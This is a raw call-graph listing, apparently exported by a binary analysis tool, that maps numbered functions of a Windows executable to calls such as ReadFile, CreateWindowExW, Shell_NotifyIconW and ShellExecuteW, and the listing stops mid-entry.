208587 _wcslen 96606->96608 96619 20adf4 96607->96619 96611 2085c2 96608->96611 96612 20859d 96608->96612 96610 246619 96610->96610 96614 22014b 22 API calls 96611->96614 96618 2088e8 22 API calls 96612->96618 96616 2085ce 96614->96616 96615 2085a5 __fread_nolock 96615->96532 96617 22017b 22 API calls 96616->96617 96617->96615 96618->96615 96620 20ae02 96619->96620 96622 20ae0b __fread_nolock 96619->96622 96620->96622 96623 20c2c9 96620->96623 96622->96610 96624 20c2d9 __fread_nolock 96623->96624 96625 20c2dc 96623->96625 96624->96622 96626 22014b 22 API calls 96625->96626 96627 20c2e7 96626->96627 96628 22017b 22 API calls 96627->96628 96628->96624 96630 20bf73 22 API calls 96629->96630 96631 202ddc 96630->96631 96631->96546 96632->96570 96633->96571 96634->96572 96635->96575 96636->96581 96637->96585 96638->96588 96639->96592 96641 270d26 GetCurrentProcess GetCurrentProcess DuplicateHandle 96640->96641 96642 270b03 InterlockedExchange 96640->96642 96641->96642 96642->96520 96644 2712e0 96643->96644 96645 2712db 96643->96645 96647 271196 InterlockedExchange 96645->96647 96648 2711c1 96647->96648 96649 2711c7 96647->96649 96650 22017b 22 API calls 96648->96650 96651 22017b 22 API calls 96649->96651 96650->96649 96652 2711d9 ReadFile 96651->96652 96653 2712a8 96652->96653 96654 2711fc 96652->96654 96656 2712c1 InterlockedExchange 96653->96656 96654->96653 96655 271206 EnterCriticalSection 96654->96655 96657 27122e __fread_nolock 96654->96657 96655->96654 96655->96657 96656->96644 96658 271279 LeaveCriticalSection ReadFile 96657->96658 96659 22017b 22 API calls 96657->96659 96658->96653 96658->96654 96659->96657 96660 242782 96663 202ab0 96660->96663 96664 243a1a DestroyWindow 96663->96664 96665 202aef mciSendStringW 96663->96665 96676 243a26 96664->96676 96666 202d66 96665->96666 96667 202b0b 96665->96667 96666->96667 96669 202d75 UnregisterHotKey 96666->96669 96668 202b19 96667->96668 96667->96676 96699 202ede 96668->96699 96669->96666 96671 243a6b 96677 243a8f 96671->96677 96678 243a7e FreeLibrary 96671->96678 96672 243a44 FindClose 96672->96676 96675 202b2e 96675->96677 96685 202b3c 96675->96685 96676->96671 96676->96672 96710 207aab 96676->96710 96679 243aa3 VirtualFree 96677->96679 96680 243ad1 96677->96680 96678->96671 96679->96677 96682 202ba9 96680->96682 96703 270b4c 96680->96703 96681 202b98 CoUninitialize 96681->96680 96681->96682 96683 202bb4 96682->96683 96684 243aeb 96682->96684 96687 202bc4 96683->96687 96691 243afa ISource 96684->96691 96714 273d30 6 API calls ISource 96684->96714 96685->96681 96708 202ff4 24 API calls 96687->96708 96689 202bda 96709 202e1c 22 API calls 96689->96709 96694 243b89 96691->96694 96715 266e3b 22 API calls ISource 96691->96715 96694->96694 96701 202eeb 96699->96701 96700 202b20 96700->96671 96700->96675 96701->96700 96716 267991 22 API calls 96701->96716 96717 271312 96703->96717 96706 270b7f DeleteCriticalSection 96706->96682 96707 270b6b 96707->96706 96708->96689 96711 207ac4 96710->96711 96712 207ab5 96710->96712 96711->96712 96713 207ac9 CloseHandle 96711->96713 96712->96676 96713->96712 96714->96684 96715->96691 96716->96701 96718 270b5a CloseHandle 96717->96718 96719 27131b InterlockedExchange 96717->96719 96718->96707 96719->96718 96720 27132f EnterCriticalSection TerminateThread WaitForSingleObject 96719->96720 96721 27135c CloseHandle 96720->96721 96722 271369 InterlockedExchange LeaveCriticalSection 96720->96722 96721->96722 96722->96718 96723 22076b 96724 220777 ___DestructExceptionObject 96723->96724 96753 220221 96724->96753 96726 22077e 96727 2208d1 96726->96727 96730 2207a8 96726->96730 96794 220baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96727->96794 96729 2208d8 96787 2251c2 96729->96787 96739 2207e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96730->96739 96764 2327ed 96730->96764 96737 2207c7 96743 220848 96739->96743 96790 22518a 38 API calls 2 library calls 96739->96790 96741 22084e 96776 20331b 96741->96776 96772 220cc9 96743->96772 96747 22086a 96747->96729 96748 22086e 96747->96748 96749 220877 96748->96749 96792 225165 28 API calls _abort 96748->96792 96793 2203b0 13 API calls 2 library calls 96749->96793 96752 22087f 96752->96737 96754 22022a 96753->96754 96796 220a08 IsProcessorFeaturePresent 96754->96796 96756 220236 96797 223004 10 API calls 3 library calls 96756->96797 96758 22023b 96763 22023f 96758->96763 96798 232687 96758->96798 96760 220256 96760->96726 96763->96726 96766 232804 96764->96766 96765 220dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96767 2207c1 96765->96767 96766->96765 96767->96737 96768 232791 96767->96768 96769 2327c0 96768->96769 96770 220dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96769->96770 96771 2327e9 96770->96771 96771->96739 96821 2226b0 96772->96821 96775 220cef 96775->96741 96777 203382 96776->96777 96778 203327 IsThemeActive 96776->96778 96791 220d02 GetModuleHandleW 96777->96791 96823 2252b3 96778->96823 96780 203352 96829 225319 96780->96829 96782 203359 96836 2032e6 SystemParametersInfoW SystemParametersInfoW 96782->96836 96784 203360 96837 20338b 96784->96837 96786 203368 SystemParametersInfoW 96786->96777 97882 224f3f 96787->97882 96790->96743 96791->96747 96792->96749 96793->96752 96794->96729 96796->96756 96797->96758 96802 23d576 96798->96802 96801 22302d 8 API calls 3 library calls 96801->96763 96803 23d593 96802->96803 96806 23d58f 96802->96806 96803->96806 96808 234eb8 96803->96808 96805 220248 96805->96760 96805->96801 96813 220dfc 96806->96813 96812 234ebf 96808->96812 96809 234f02 GetStdHandle 96809->96812 96810 234f6a 96810->96803 96811 234f15 GetFileType 96811->96812 96812->96809 96812->96810 96812->96811 96814 220e07 IsProcessorFeaturePresent 96813->96814 96815 220e05 96813->96815 96817 220fce 96814->96817 96815->96805 96820 220f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96817->96820 96819 2210b1 96819->96805 96820->96819 96822 220cdc GetStartupInfoW 96821->96822 96822->96775 96824 2252bf ___DestructExceptionObject 96823->96824 96886 2332d1 EnterCriticalSection 96824->96886 96826 2252ca pre_c_initialization 96887 22530a 96826->96887 96828 2252ff __wsopen_s 96828->96780 96830 22533f 96829->96830 96831 225325 96829->96831 96830->96782 96831->96830 96891 22f649 20 API calls __dosmaperr 96831->96891 96833 22532f 96892 232b5c 26 API calls __cftof 96833->96892 96835 22533a 96835->96782 96836->96784 96838 20339b __wsopen_s 96837->96838 96839 20bf73 22 API calls 96838->96839 96840 2033a7 GetCurrentDirectoryW 96839->96840 96893 204fd9 96840->96893 96842 2033ce IsDebuggerPresent 96843 243ca3 MessageBoxA 96842->96843 96844 2033dc 96842->96844 96846 243cbb 96843->96846 96845 2033f0 96844->96845 96844->96846 96961 203a95 96845->96961 97011 204176 22 API calls 96846->97011 96850 203462 96855 243cec SetCurrentDirectoryW 96850->96855 96856 20346a 96850->96856 96851 20340f GetFullPathNameW 96852 208577 22 API calls 96851->96852 96853 20344e 96852->96853 96977 20425f 96853->96977 96855->96856 96857 203475 96856->96857 97012 261fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 96856->97012 96993 2034d3 7 API calls 96857->96993 96860 243d07 96860->96857 96863 243d19 96860->96863 97013 205594 96863->97013 96864 20347f 96870 203494 96864->96870 96997 20396b 96864->96997 96866 243d22 97020 20b329 96866->97020 96869 243d30 96872 243d5f 96869->96872 96873 243d38 96869->96873 96871 2034af 96870->96871 97007 203907 96870->97007 96875 2034b6 SetCurrentDirectoryW 96871->96875 96876 206b7c 22 API calls 96872->96876 97026 206b7c 96873->97026 96878 2034ca 96875->96878 96879 243d5b GetForegroundWindow ShellExecuteW 96876->96879 96878->96786 96883 243d90 96879->96883 96883->96871 96884 243d51 96885 206b7c 22 API calls 96884->96885 96885->96879 96886->96826 96890 233319 LeaveCriticalSection 96887->96890 96889 225311 96889->96828 96890->96889 96891->96833 96892->96835 96894 20bf73 22 API calls 96893->96894 96895 204fef 96894->96895 97036 2063d7 96895->97036 96897 20500d 97050 20bd57 96897->97050 96900 20bed9 22 API calls 96901 20502c 96900->96901 97056 20893c 96901->97056 96904 20b329 22 API calls 96905 205045 96904->96905 97059 20be2d 96905->97059 96907 205055 96908 20b329 22 API calls 96907->96908 96909 20507b 96908->96909 96910 20be2d 40 API calls 96909->96910 96911 20508a 96910->96911 96912 20bf73 22 API calls 96911->96912 96913 2050a8 96912->96913 97063 2051ca 96913->97063 96917 2050c2 96918 244b23 96917->96918 96919 2050cc 96917->96919 96921 2051ca 22 API calls 96918->96921 96920 224d98 40 API calls 96919->96920 96922 2050d7 96920->96922 96923 244b37 96921->96923 96922->96923 96924 2050e1 96922->96924 96925 2051ca 22 API calls 96923->96925 96926 224d98 40 API calls 96924->96926 96927 244b53 96925->96927 96928 2050ec 96926->96928 96930 205594 24 API calls 96927->96930 96928->96927 96929 2050f6 96928->96929 96931 224d98 40 API calls 96929->96931 96932 244b76 96930->96932 96933 205101 96931->96933 96934 2051ca 22 API calls 96932->96934 96935 244b9f 96933->96935 96936 20510b 96933->96936 96938 244b82 96934->96938 96937 2051ca 22 API calls 96935->96937 96939 20512e 96936->96939 96940 20bed9 22 API calls 96936->96940 96941 244bbd 96937->96941 96943 20bed9 22 API calls 96938->96943 96942 244bda 96939->96942 97079 207e12 96939->97079 96944 205121 96940->96944 96945 20bed9 22 API calls 96941->96945 96947 244b90 96943->96947 96948 2051ca 22 API calls 96944->96948 96949 244bcb 96945->96949 96951 2051ca 22 API calls 96947->96951 96948->96939 96952 2051ca 22 API calls 96949->96952 96951->96935 96952->96942 96956 20893c 22 API calls 96958 205167 96956->96958 96957 208a60 22 API calls 96957->96958 96958->96956 96958->96957 96959 2051ab 96958->96959 96960 2051ca 22 API calls 96958->96960 96959->96842 96960->96958 96962 203aa2 __wsopen_s 96961->96962 96963 203abb 96962->96963 96964 2440da ___scrt_fastfail 96962->96964 97128 205851 96963->97128 96966 2440f6 GetOpenFileNameW 96964->96966 96968 244145 96966->96968 96970 208577 22 API calls 96968->96970 96972 24415a 96970->96972 96972->96972 96974 203ad9 97156 2062d5 96974->97156 96978 20426c __wsopen_s 96977->96978 97807 205b85 96978->97807 97822 203624 7 API calls 96993->97822 96995 20347a 96996 2035b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96995->96996 96996->96864 96998 203996 ___scrt_fastfail 96997->96998 97823 205f32 96998->97823 97002 2440cd Shell_NotifyIconW 97003 203a3a Shell_NotifyIconW 97827 2061a9 97003->97827 97004 203a1c 97004->97002 97004->97003 97006 203a50 97006->96870 97008 203969 97007->97008 97009 203919 ___scrt_fastfail 97007->97009 97008->96871 97010 203938 Shell_NotifyIconW 97009->97010 97010->97008 97011->96850 97012->96860 97014 2422d0 __wsopen_s 97013->97014 97015 2055a1 GetModuleFileNameW 97014->97015 97016 20b329 22 API calls 97015->97016 97017 2055c7 97016->97017 97018 205851 23 API calls 97017->97018 97019 2055d1 97018->97019 97019->96866 97021 20b338 _wcslen 97020->97021 97022 22017b 22 API calls 97021->97022 97023 20b360 __fread_nolock 97022->97023 97024 22014b 22 API calls 97023->97024 97025 20b376 97024->97025 97025->96869 97027 206b93 97026->97027 97028 2457fe 97026->97028 97867 206ba4 97027->97867 97030 22014b 22 API calls 97028->97030 97032 245808 _wcslen 97030->97032 97031 206b9e 97035 207bb5 22 API calls 97031->97035 97033 22017b 22 API calls 97032->97033 97034 245841 __fread_nolock 97033->97034 97035->96884 97037 2063e4 __wsopen_s 97036->97037 97038 208577 22 API calls 97037->97038 97039 206416 97037->97039 97038->97039 97044 20644c 97039->97044 97101 20655e 97039->97101 97041 20655e 22 API calls 97041->97044 97042 20651a 97043 20654f 97042->97043 97045 20b329 22 API calls 97042->97045 97043->96897 97044->97041 97044->97042 97047 20b329 22 API calls 97044->97047 97104 206a7c 97044->97104 97046 206543 97045->97046 97048 206a7c 22 API calls 97046->97048 97047->97044 97048->97043 97051 20bd71 97050->97051 97055 205021 97050->97055 97052 22014b 22 API calls 97051->97052 97053 20bd7b 97052->97053 97054 22017b 22 API calls 97053->97054 97054->97055 97055->96900 97057 22014b 22 API calls 97056->97057 97058 205038 97057->97058 97058->96904 97060 20be38 97059->97060 97061 20be67 97060->97061 97110 20bfa5 40 API calls 97060->97110 97061->96907 97064 2051f2 97063->97064 97065 2051d4 97063->97065 97067 208577 22 API calls 97064->97067 97066 2050b4 97065->97066 97068 20bed9 22 API calls 97065->97068 97069 224d98 97066->97069 97067->97066 97068->97066 97070 224da6 97069->97070 97071 224e1b 97069->97071 97074 224dcb 97070->97074 97111 22f649 20 API calls __dosmaperr 97070->97111 97113 224e2d 40 API calls 3 library calls 97071->97113 97073 224e28 97073->96917 97074->96917 97076 224db2 97112 232b5c 26 API calls __cftof 97076->97112 97078 224dbd 97078->96917 97080 207e1a 97079->97080 97081 22014b 22 API calls 97080->97081 97082 207e28 97081->97082 97114 208445 97082->97114 97085 208470 97117 20c760 97085->97117 97087 208480 97088 22017b 22 API calls 97087->97088 97089 20514c 97087->97089 97088->97089 97090 208a60 97089->97090 97091 208a76 97090->97091 97092 208a80 97091->97092 97093 246737 97091->97093 97094 246744 97092->97094 97097 208b9b 97092->97097 97099 208b94 97092->97099 97126 21b7a2 22 API calls 97093->97126 97127 20b4c8 22 API calls 97094->97127 97097->96958 97098 246762 97098->97098 97100 22014b 22 API calls 97099->97100 97100->97097 97102 20c2c9 22 API calls 97101->97102 97103 206569 97102->97103 97103->97039 97105 206a8b 97104->97105 97109 206aac __fread_nolock 97104->97109 97107 22017b 22 API calls 97105->97107 97106 22014b 22 API calls 97108 206abf 97106->97108 97107->97109 97108->97044 97109->97106 97110->97061 97111->97076 97112->97078 97113->97073 97115 22014b 22 API calls 97114->97115 97116 20513e 97115->97116 97116->97085 97118 20c76b 97117->97118 97119 251285 97118->97119 97123 20c773 ISource 97118->97123 97120 22014b 22 API calls 97119->97120 97122 251291 97120->97122 97121 20c77a 97121->97087 97123->97121 97125 20c7e0 22 API calls ISource 97123->97125 97125->97123 97126->97094 97127->97098 97186 2422d0 97128->97186 97131 205898 97134 20bd57 22 API calls 97131->97134 97132 20587d 97133 208577 22 API calls 97132->97133 97135 205889 97133->97135 97134->97135 97188 2055dc 97135->97188 97138 203a57 97139 2422d0 __wsopen_s 97138->97139 97140 203a64 GetLongPathNameW 97139->97140 97141 208577 22 API calls 97140->97141 97142 203a8c 97141->97142 97143 2053f2 97142->97143 97144 20bf73 22 API calls 97143->97144 97145 205404 97144->97145 97146 205851 23 API calls 97145->97146 97147 20540f 97146->97147 97148 20541a 97147->97148 97151 244d5b 97147->97151 97150 206a7c 22 API calls 97148->97150 97152 205426 97150->97152 97153 244d7d 97151->97153 97198 21e36b 41 API calls 97151->97198 97192 201340 97152->97192 97155 205439 97155->96974 97199 206679 97156->97199 97159 245336 97324 2736b8 97159->97324 97160 206679 94 API calls 97162 20630e 97160->97162 97162->97159 97164 206316 97162->97164 97163 245347 97165 245368 97163->97165 97166 24534b 97163->97166 97168 206322 97164->97168 97169 245353 97164->97169 97167 22017b 22 API calls 97165->97167 97373 2066e7 97166->97373 97185 2453ad 97167->97185 97221 203b39 97168->97221 97379 26e30e 82 API calls 97169->97379 97173 203407 97173->96850 97173->96851 97174 245361 97174->97165 97175 24555e 97180 245566 97175->97180 97176 2066e7 68 API calls 97176->97180 97180->97176 97381 26a215 82 API calls __wsopen_s 97180->97381 97182 20b329 22 API calls 97182->97185 97185->97175 97185->97180 97185->97182 97350 269ff8 97185->97350 97353 271519 97185->97353 97359 20bba9 97185->97359 97367 205d21 97185->97367 97380 269f27 42 API calls _wcslen 97185->97380 97187 20585e GetFullPathNameW 97186->97187 97187->97131 97187->97132 97189 2055ea 97188->97189 97190 20adf4 22 API calls 97189->97190 97191 203ac4 97190->97191 97191->97138 97193 201352 97192->97193 97197 201371 __fread_nolock 97192->97197 97195 22017b 22 API calls 97193->97195 97194 22014b 22 API calls 97196 201388 97194->97196 97195->97197 97196->97155 97197->97194 97198->97151 97382 20663e LoadLibraryA 97199->97382 97204 2066a4 LoadLibraryExW 97390 206607 LoadLibraryA 97204->97390 97205 245648 97207 2066e7 68 API calls 97205->97207 97208 24564f 97207->97208 97210 206607 3 API calls 97208->97210 97212 245657 97210->97212 97411 20684a 97212->97411 97213 2066ce 97213->97212 97214 2066da 97213->97214 97216 2066e7 68 API calls 97214->97216 97218 2062fa 97216->97218 97218->97159 97218->97160 97220 24567e 97222 203b62 97221->97222 97223 24415f 97221->97223 97225 22017b 22 API calls 97222->97225 97672 26a215 82 API calls __wsopen_s 97223->97672 97227 203b86 97225->97227 97226 203bec 97232 203bfa 97226->97232 97234 244179 97226->97234 97673 26d5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97226->97673 97228 207aab CloseHandle 97227->97228 97229 203b94 97228->97229 97230 20bf73 22 API calls 97229->97230 97231 203b9d 97230->97231 97233 207aab CloseHandle 97231->97233 97235 20bf73 22 API calls 97232->97235 97237 203ba6 97233->97237 97234->97226 97234->97232 97236 203c06 97235->97236 97646 203ae9 97236->97646 97240 207aab CloseHandle 97237->97240 97243 203baf 97240->97243 97241 2441d5 97241->97232 97660 206fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 97243->97660 97244 20bf73 22 API calls 97246 203c1e 97244->97246 97248 205851 23 API calls 97246->97248 97247 203bc9 97249 203bd1 97247->97249 97250 244591 97247->97250 97251 203c2c 97248->97251 97661 206c5f 27 API calls ISource 97249->97661 97685 26a215 82 API calls __wsopen_s 97250->97685 97651 203b1c 97251->97651 97254 2445a6 97254->97254 97258 203be3 97662 206c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97258->97662 97261 203c6f 97263 20bf73 22 API calls 97261->97263 97262 2441eb 97264 207aab CloseHandle 97262->97264 97265 203c78 97263->97265 97266 2441f4 97264->97266 97267 20bf73 22 API calls 97265->97267 97268 206679 94 API calls 97266->97268 97269 203c81 97267->97269 97271 24421c 97268->97271 97663 20568e 22 API calls 97269->97663 97273 244528 97271->97273 97276 2736b8 80 API calls 97271->97276 97272 203c98 97664 207bb5 22 API calls 97272->97664 97682 26a215 82 API calls __wsopen_s 97273->97682 97278 24423b 97276->97278 97277 203ca9 SetCurrentDirectoryW 97283 203cbc 97277->97283 97279 2066e7 68 API calls 97278->97279 97280 244249 97279->97280 97280->97273 97281 244251 97280->97281 97282 22014b 22 API calls 97281->97282 97284 244279 97282->97284 97285 22017b 22 API calls 97283->97285 97290 20bba9 22 API calls 97284->97290 97286 203ccf 97285->97286 97288 20423c 22 API calls 97286->97288 97287 207aab CloseHandle 97289 203e5c 97287->97289 97322 203cda ISource _wcslen 97288->97322 97291 207aab CloseHandle 97289->97291 97319 2442ba 97290->97319 97295 203e6e 97291->97295 97292 244495 97676 27148b 97292->97676 97293 203e07 97294 207aab CloseHandle 97293->97294 97297 203e10 SetCurrentDirectoryW 97294->97297 97295->97173 97309 203e2a ISource 97297->97309 97300 2444bb 97680 264ad3 22 API calls __fread_nolock 97300->97680 97302 20bba9 22 API calls 97302->97319 97304 244574 97684 26a215 82 API calls __wsopen_s 97304->97684 97307 244588 97307->97293 97309->97287 97310 269ff8 22 API calls 97310->97319 97312 20b329 22 API calls 97312->97322 97314 20b329 22 API calls 97314->97319 97316 271519 22 API calls 97316->97319 97318 2444fd 97681 26a215 82 API calls __wsopen_s 97318->97681 97319->97292 97319->97302 97319->97310 97319->97314 97319->97316 97319->97318 97674 269f27 42 API calls _wcslen 97319->97674 97675 204176 22 API calls 97319->97675 97321 244516 97321->97309 97322->97293 97322->97304 97322->97312 97665 20ae4e 33 API calls 97322->97665 97666 204129 GetStringTypeW 97322->97666 97667 204089 40 API calls 97322->97667 97668 20404e GetStringTypeW _wcslen 97322->97668 97669 226735 GetStringTypeW 97322->97669 97670 203eab 136 API calls 2 library calls 97322->97670 97671 204176 22 API calls 97322->97671 97683 269ec0 22 API calls _wcslen 97322->97683 97325 2736d4 97324->97325 97326 206874 64 API calls 97325->97326 97327 2736e8 97326->97327 97694 273827 97327->97694 97330 20684a 40 API calls 97331 273717 97330->97331 97332 20684a 40 API calls 97331->97332 97333 273727 97332->97333 97334 20684a 40 API calls 97333->97334 97335 273742 97334->97335 97336 20684a 40 API calls 97335->97336 97337 27375d 97336->97337 97338 206874 64 API calls 97337->97338 97339 273774 97338->97339 97340 22ed7c ___std_exception_copy 21 API calls 97339->97340 97341 27377b 97340->97341 97342 22ed7c ___std_exception_copy 21 API calls 97341->97342 97343 273785 97342->97343 97344 20684a 40 API calls 97343->97344 97345 273799 97344->97345 97346 2732bd 27 API calls 97345->97346 97348 2737af 97346->97348 97347 273700 97347->97163 97348->97347 97700 272c8d 97348->97700 97351 22017b 22 API calls 97350->97351 97352 26a028 __fread_nolock 97351->97352 97352->97185 97352->97352 97354 271524 97353->97354 97355 22014b 22 API calls 97354->97355 97356 27153b 97355->97356 97357 20b329 22 API calls 97356->97357 97358 271546 97357->97358 97358->97185 97360 20bc33 97359->97360 97364 20bbb9 __fread_nolock 97359->97364 97363 22017b 22 API calls 97360->97363 97361 22014b 22 API calls 97362 20bbc0 97361->97362 97365 22014b 22 API calls 97362->97365 97366 20bbde 97362->97366 97363->97364 97364->97361 97365->97366 97366->97185 97368 205d34 97367->97368 97372 205dd8 97367->97372 97370 22017b 22 API calls 97368->97370 97371 205d66 97368->97371 97369 22014b 22 API calls 97369->97371 97370->97371 97371->97369 97371->97372 97372->97185 97374 2066f1 97373->97374 97375 2066f8 97373->97375 97376 22e9e8 67 API calls 97374->97376 97377 2456a4 FreeLibrary 97375->97377 97378 20670f 97375->97378 97376->97375 97378->97169 97379->97174 97380->97185 97381->97180 97383 206674 97382->97383 97384 206656 GetProcAddress 97382->97384 97387 22e95b 97383->97387 97385 206666 97384->97385 97385->97383 97386 20666d FreeLibrary 97385->97386 97386->97383 97419 22e89a 97387->97419 97389 206698 97389->97204 97389->97205 97391 20663b 97390->97391 97392 20661c GetProcAddress 97390->97392 97395 206720 97391->97395 97393 20662c 97392->97393 97393->97391 97394 206634 FreeLibrary 97393->97394 97394->97391 97396 22017b 22 API calls 97395->97396 97397 206735 97396->97397 97479 20423c 97397->97479 97399 206741 __fread_nolock 97400 2456c2 97399->97400 97404 20677c 97399->97404 97487 273a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 97399->97487 97488 273a92 74 API calls 97400->97488 97403 20684a 40 API calls 97403->97404 97404->97403 97405 245706 97404->97405 97406 206874 64 API calls 97404->97406 97408 206810 ISource 97404->97408 97482 206874 97405->97482 97406->97404 97408->97213 97410 20684a 40 API calls 97410->97408 97412 245760 97411->97412 97413 20685c 97411->97413 97520 22ec34 97413->97520 97416 2732bd 97629 27310d 97416->97629 97418 2732d8 97418->97220 97422 22e8a6 ___DestructExceptionObject 97419->97422 97420 22e8b4 97444 22f649 20 API calls __dosmaperr 97420->97444 97422->97420 97424 22e8e4 97422->97424 97423 22e8b9 97445 232b5c 26 API calls __cftof 97423->97445 97426 22e8f6 97424->97426 97427 22e8e9 97424->97427 97436 2383e1 97426->97436 97446 22f649 20 API calls __dosmaperr 97427->97446 97430 22e8ff 97431 22e912 97430->97431 97432 22e905 97430->97432 97448 22e944 LeaveCriticalSection __fread_nolock 97431->97448 97447 22f649 20 API calls __dosmaperr 97432->97447 97434 22e8c4 __wsopen_s 97434->97389 97437 2383ed ___DestructExceptionObject 97436->97437 97449 2332d1 EnterCriticalSection 97437->97449 97439 2383fb 97450 23847b 97439->97450 97443 23842c __wsopen_s 97443->97430 97444->97423 97445->97434 97446->97434 97447->97434 97448->97434 97449->97439 97451 23849e 97450->97451 97452 2384f7 97451->97452 97458 238408 97451->97458 97467 2294fd EnterCriticalSection 97451->97467 97468 229511 LeaveCriticalSection 97451->97468 97469 234ff0 20 API calls 2 library calls 97452->97469 97454 238500 97470 232d38 97454->97470 97457 238509 97457->97458 97476 233778 11 API calls 2 library calls 97457->97476 97464 238437 97458->97464 97461 238528 97477 2294fd EnterCriticalSection 97461->97477 97463 23853b 97463->97458 97478 233319 LeaveCriticalSection 97464->97478 97466 23843e 97466->97443 97467->97451 97468->97451 97469->97454 97471 232d43 RtlFreeHeap 97470->97471 97475 232d6c _free 97470->97475 97472 232d58 97471->97472 97471->97475 97473 22f649 _free 18 API calls 97472->97473 97474 232d5e GetLastError 97473->97474 97474->97475 97475->97457 97476->97461 97477->97463 97478->97466 97480 22014b 22 API calls 97479->97480 97481 20424e 97480->97481 97481->97399 97483 206883 97482->97483 97484 245780 97482->97484 97489 22f053 97483->97489 97487->97400 97488->97404 97492 22ee1a 97489->97492 97491 206891 97491->97410 97493 22ee26 ___DestructExceptionObject 97492->97493 97494 22ee32 97493->97494 97496 22ee58 97493->97496 97517 22f649 20 API calls __dosmaperr 97494->97517 97505 2294fd EnterCriticalSection 97496->97505 97497 22ee37 97518 232b5c 26 API calls __cftof 97497->97518 97499 22ee64 97506 22ef7a 97499->97506 97502 22ee78 97519 22ee97 LeaveCriticalSection __fread_nolock 97502->97519 97504 22ee42 __wsopen_s 97504->97491 97505->97499 97507 22ef9c 97506->97507 97508 22ef8c 97506->97508 97510 22eea1 28 API calls 97507->97510 97509 22f649 _free 20 API calls 97508->97509 97511 22ef91 97509->97511 97512 22efbf 97510->97512 97511->97502 97513 22df7b 62 API calls 97512->97513 97516 22f03e 97512->97516 97514 22efe6 97513->97514 97515 2397a4 __fread_nolock 28 API calls 97514->97515 97515->97516 97516->97502 97517->97497 97518->97504 97519->97504 97523 22ec51 97520->97523 97522 20686d 97522->97416 97524 22ec5d ___DestructExceptionObject 97523->97524 97525 22ec70 ___scrt_fastfail 97524->97525 97526 22ec9d 97524->97526 97527 22ec95 __wsopen_s 97524->97527 97550 22f649 20 API calls __dosmaperr 97525->97550 97536 2294fd EnterCriticalSection 97526->97536 97527->97522 97530 22eca7 97537 22ea68 97530->97537 97531 22ec8a 97551 232b5c 26 API calls __cftof 97531->97551 97536->97530 97539 22ea7a ___scrt_fastfail 97537->97539 97543 22ea97 97537->97543 97538 22ea87 97625 22f649 20 API calls __dosmaperr 97538->97625 97539->97538 97539->97543 97545 22eada __fread_nolock 97539->97545 97541 22ea8c 97626 232b5c 26 API calls __cftof 97541->97626 97552 22ecdc LeaveCriticalSection __fread_nolock 97543->97552 97544 22ebf6 ___scrt_fastfail 97628 22f649 20 API calls __dosmaperr 97544->97628 97545->97543 97545->97544 97553 22dcc5 97545->97553 97560 2390c5 97545->97560 97627 22d2e8 26 API calls 4 library calls 97545->97627 97550->97531 97551->97527 97552->97527 97554 22dcd1 97553->97554 97555 22dce6 97553->97555 97556 22f649 _free 20 API calls 97554->97556 97555->97545 97557 22dcd6 97556->97557 97558 232b5c __cftof 26 API calls 97557->97558 97559 22dce1 97558->97559 97559->97545 97561 2390d7 97560->97561 97562 2390ef 97560->97562 97563 22f636 __dosmaperr 20 API calls 97561->97563 97564 239459 97562->97564 97569 239134 97562->97569 97565 2390dc 97563->97565 97566 22f636 __dosmaperr 20 API calls 97564->97566 97567 22f649 _free 20 API calls 97565->97567 97568 23945e 97566->97568 97572 2390e4 97567->97572 97570 22f649 _free 20 API calls 97568->97570 97571 23913f 97569->97571 97569->97572 97576 23916f 97569->97576 97573 23914c 97570->97573 97574 22f636 __dosmaperr 20 API calls 97571->97574 97572->97545 97577 232b5c __cftof 26 API calls 97573->97577 97575 239144 97574->97575 97578 22f649 _free 20 API calls 97575->97578 97579 239188 97576->97579 97580 2391ca 97576->97580 97581 2391ae 97576->97581 97577->97572 97578->97573 97579->97581 97585 239195 97579->97585 97583 233b93 __fread_nolock 21 API calls 97580->97583 97582 22f636 __dosmaperr 20 API calls 97581->97582 97584 2391b3 97582->97584 97586 2391e1 97583->97586 97588 22f649 _free 20 API calls 97584->97588 97587 23fc1b __fread_nolock 26 API calls 97585->97587 97589 232d38 _free 20 API calls 97586->97589 97590 239333 97587->97590 97591 2391ba 97588->97591 97592 2391ea 97589->97592 97593 2393a9 97590->97593 97597 23934c GetConsoleMode 97590->97597 97594 232b5c __cftof 26 API calls 97591->97594 97595 232d38 _free 20 API calls 97592->97595 97596 2393ad ReadFile 97593->97596 97622 2391c5 __fread_nolock 97594->97622 97598 2391f1 97595->97598 97599 239421 GetLastError 97596->97599 97600 2393c7 97596->97600 97597->97593 97601 23935d 97597->97601 97602 239216 97598->97602 97603 2391fb 97598->97603 97604 239385 97599->97604 97605 23942e 97599->97605 97600->97599 97606 23939e 97600->97606 97601->97596 97607 239363 ReadConsoleW 97601->97607 97612 2397a4 __fread_nolock 28 API calls 97602->97612 97610 22f649 _free 20 API calls 97603->97610 97613 22f613 __dosmaperr 20 API calls 97604->97613 97604->97622 97611 22f649 _free 20 API calls 97605->97611 97618 239403 97606->97618 97619 2393ec 97606->97619 97606->97622 97607->97606 97608 23937f GetLastError 97607->97608 97608->97604 97609 232d38 _free 20 API calls 97609->97572 97614 239200 97610->97614 97615 239433 97611->97615 97612->97585 97613->97622 97616 22f636 __dosmaperr 20 API calls 97614->97616 97617 22f636 __dosmaperr 20 API calls 97615->97617 97616->97622 97617->97622 97621 23941a 97618->97621 97618->97622 97620 238de1 __fread_nolock 31 API calls 97619->97620 97620->97622 97623 238c21 __fread_nolock 29 API calls 97621->97623 97622->97609 97624 23941f 97623->97624 97624->97622 97625->97541 97626->97543 97627->97545 97628->97541 97632 22e858 97629->97632 97631 27311c 97631->97418 97635 22e7d9 97632->97635 97634 22e875 97634->97631 97636 22e7e8 97635->97636 97637 22e7fc 97635->97637 97643 22f649 20 API calls __dosmaperr 97636->97643 97641 